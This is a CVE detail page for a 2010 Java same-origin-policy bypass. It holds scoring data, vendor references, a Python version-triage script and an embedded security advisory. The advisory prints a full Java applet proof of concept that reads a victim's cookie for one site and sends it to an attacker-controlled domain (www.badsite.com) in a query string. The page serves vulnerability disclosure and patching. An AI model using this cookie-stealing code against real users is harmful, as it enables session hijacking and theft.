CVE-2010-3573 : Detail

CVE-2010-3573

21.37%V3
Network
2010-10-19
19h00 +00:00
2018-10-10
16h57 +00:00

CVE Descriptions

Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this is related to missing validation of request headers in the HttpURLConnection class when they are set by applets, which allows remote attackers to bypass the intended security policy.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No information.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 15288

Publication date : 2010-10-19 22h00 +00:00
Author : Roberto Suggi Liverani
EDB Verified : No

Description

Security-Assessment.com discovered that a Java Applet making use of java.net.URLConnection class can be used to bypass same-of-origin (SOP) policy and domain based security controls in modern browsers when communication occurs between two domains that resolve to the same IP address. This advisory includes a Proof-of-Concept (PoC) demo and Java Applet source code. This demonstrates how the security vulnerability can be exploited to leak cookie information to an unauthorised domain, which resides on the same host IP address.

Exploitation

The Flash movie demo can be viewed at the following link: http://www.security-assessment.com/files/advisories/java_net_urlconnection_sop_bypass_demo.swf

The Proof of Concept (PoC) demonstrates that a Cross Site Request Forgery (XSRF) attack can be leveraged by using a Java Applet which implements the java.net.URLConnection class. Traditionally, XSRF is used to force a user to perform an unwanted action on a target web site. In this case, the PoC shows that XSRF can be used to capture sensitive information such as a cookie related to a target web site.

The following assumptions are made in this PoC:

1. The virtual hosts www.targetsite.net and www.badsite.com resolve to the same IP address;
2. A malicious user controls www.badsite.com web site;
3. A malicious user targets www.targetsite.net users.

The following table summarises the sequence of actions shown in demo:

1. User has a valid cookie for www.targetsite.net
2. The same user visits www.badsite.com which performs a cross site forged request to www.targetsite.net. The forged request is performed by a Java Applet embedded on the malicious site. The Java Applet bypasses the Same-of-Origin policy (SOP) as an unsigned Java Applet should not be able to communicate from www.badsite.com to www.targetsite.net without a crossdomain.xml policy file.
3. Java Applet performs first GET request to www.targetsite.net. At this stage, the Java Applet already controls the Cookie: header sent to www.targetsite.net through the getRequestProperty("cookie") method. This is in breach with SOP.
4. A second request is done for the purpose of the demo which leaks www.targetsite.net cookies to www.badsite.com via an HTTP GET request.

Testing was successfully performed using Java(TM) SE Runtime Environment (build 1.6.0_21-b07) and the following browsers (all Windows XP):

Mozilla Firefox 3.5.8
Opera 10.60
Internet Explorer 6.0.2900.5512
Google Chrome 5.0.375.9
Internet Explorer 8.0.6001.18702
Safari 5.0 (7533.16)

MaliciousJavaApplet.java:

```java
import java.awt.*;
import java.io.*;
import java.net.*;

public class MaliciousJavaApplet extends java.applet.Applet {
    TextArea messageLog = new TextArea(4, 40);

    public void init() {
        setLayout(new BorderLayout());
        add("Center", messageLog);
    }

    public void start() {
        try {
            // First request (step 3 above): GET to the target virtual host
            URL url = new URL("http://www.targetsite.net/default.html");
            URLConnection connection;
            String inputLine;
            BufferedReader inReader;
            connection = url.openConnection();
            connection.setAllowUserInteraction(false);
            connection.setDoOutput(true);
            messageLog.append("Request Property " + connection.getRequestProperty("cookie") + "\n");
            messageLog.append("File read from URL " + url + ":\n");
            inReader = new BufferedReader(
                    new InputStreamReader(connection.getInputStream()));
            while (null != (inputLine = inReader.readLine())) {
                messageLog.append(inputLine + "\n");
            }
            inReader.close();
            // The request Cookie header is readable by the applet (the SOP breach described above)
            messageLog.append("Request Property " + connection.getRequestProperty("cookie") + "\n");
            String cookie;
            cookie = connection.getRequestProperty("cookie");
            // Second request (step 4 above): the cookie value is passed to the other domain
            URL url2 = new URL("http://www.badsite.com/default.html?cookie=" + cookie);
            URLConnection connection2;
            String inputLine2;
            BufferedReader inReader2;
            connection2 = url2.openConnection();
            connection2.setAllowUserInteraction(false);
            connection2.setDoOutput(true);
            inReader2 = new BufferedReader(
                    new InputStreamReader(connection2.getInputStream()));
            while (null != (inputLine2 = inReader2.readLine())) {
                messageLog.append(inputLine2 + "\n");
            }
            inReader2.close();
        } catch (IOException e) {
            System.err.println("Exception: " + e);
        }
    }
}
```

Solution

Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory - October 2010. Security-Assessment.com recommends all users of JRE and JDK to upgrade to the latest version as soon as possible.

For more information on the new release of JRE/JDK please refer to the release notes: http://www.oracle.com/technetwork/java/javase/downloads/index.html

About Security-Assessment.com

Security-Assessment.com is Australasia’s leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:

Web: www.security-assessment.com
Email: info@security-assessment.com
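A patch-triage check for the affected releases named in the CVE description above, added here as an example (it is not part of the advisory or of any Oracle tooling). The inventory lines are constructed, and treating every earlier update of a family as affected is an assumption drawn from the "Version To (including)" product entries on this page.

```python
import re

# Last affected update per release family, from the CVE description on this
# page: "6 Update 21 and 5.0 Update 25". Assumption: every earlier update of
# the same family is affected too ("Version To (including)" entries).
LAST_AFFECTED = {(1, 6): 21, (1, 5): 25}

# Legacy Sun/Oracle version strings: 1.6.0_21-b07, 1.5.0_25, 1.6.0
VERSION_RE = re.compile(r"\b(1)\.(\d+)\.0(?!\d)(?:_(\d+))?")


def parse_java_version(text):
    """Return (major, minor, update) found in `java -version` style text, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    # A string without "_NN" (e.g. "1.6.0") is the initial release: update 0.
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def triage(text):
    """Classify one version string against the ranges listed on this page."""
    parsed = parse_java_version(text)
    if parsed is None:
        return "unparsed"            # not a 1.x.0_NN string; review by hand
    major, minor, update = parsed
    last = LAST_AFFECTED.get((major, minor))
    if last is None:
        return "family-not-listed"   # page gives no data for this family
    return "affected" if update <= last else "newer-than-listed"


def scan(inventory):
    """Map each host to its verdict; inventory is {host: version text}."""
    return {host: triage(line) for host, line in inventory.items()}


# Constructed sample inventory (hypothetical host names).
SAMPLE_INVENTORY = {
    "ws-001": "Java(TM) SE Runtime Environment (build 1.6.0_21-b07)",
    "ws-002": 'java version "1.6.0_22"',
    "ws-003": 'java version "1.5.0_25"',
    "ws-004": 'java version "1.6.0"',
    "ws-005": "version string missing",
}

if __name__ == "__main__":
    for host, verdict in sorted(scan(SAMPLE_INVENTORY).items()):
        print(host, verdict)
```

A "newer-than-listed" verdict only means the update number is above the last one this page names as affected; confirm the fixed release against the vendor advisories in the references.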

Products Mentioned

Configuration 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Configuration 0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

References

http://www.redhat.com/support/errata/RHSA-2010-0865.html
Tags : vendor-advisory, x_refsource_REDHAT
http://security.gentoo.org/glsa/glsa-201406-32.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.redhat.com/support/errata/RHSA-2010-0770.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0768.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.ubuntu.com/usn/USN-1010-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.redhat.com/support/errata/RHSA-2010-0987.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/44954
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2011-0880.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0873.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/42974
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/41972
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/41967
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0807.html
Tags : vendor-advisory, x_refsource_REDHAT